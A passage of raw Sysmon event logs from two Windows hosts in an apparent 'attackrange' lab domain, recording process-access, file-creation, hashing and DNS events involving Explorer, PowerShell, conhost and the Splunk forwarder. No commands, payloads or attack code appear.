07:57:26.888{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.888{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.882{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:26.881{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.881{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:26.880{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.880{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.880{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.880{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.879{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.879{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5942E35791B56BA842C21D9E370EA796,SHA256=B2B2B2AC5349872F07C08872CE6A8FA03A4D94539657C91E6A787E8A421694C3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.872{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x8000000000000000808509Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:26.666{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20F4A289F7A03AB2C175CFAB0E45A068,SHA256=699B955CDA56F81CE458B732270FC2495E9054A8706C8247B018B42E24BFF71B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808508Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E6-60EB-9979-00000000D001}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808507Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000808506Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808505Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808504Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808503Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808502Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808501Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808500Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808499Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808498Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.338{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5E6-60EB-9979-00000000D001}3728C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808497Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.338{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E6-60EB-9979-00000000D001}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808496Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.338{0C1E0330-F5E6-60EB-9979-00000000D001}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808495Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.306{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11B4AEE42052739F5C38A98205630379,SHA256=E6EE711B0A1D0434D4097E7D6EA5575BA24D85DE79455349ED55D75FE5F7E8DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.871{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=AE4455F4A85756CD28D57F5D7E8A8F3A,SHA256=519C041305F4BC73B0F2D9EAF1D9219F037CE384281820F19EDBA1FBE830EF30,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.859{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\ws.ps1.lnk2021-07-12 07:57:26.859 354300x80000000000000001051061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:18.374{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57446- 10341000x80000000000000001051060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.850{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.850{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.844{466BC892-F5E6-60EB-827D-00000000CF01}97248732C:\Windows\system32\conhost.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:26.832{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.826{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W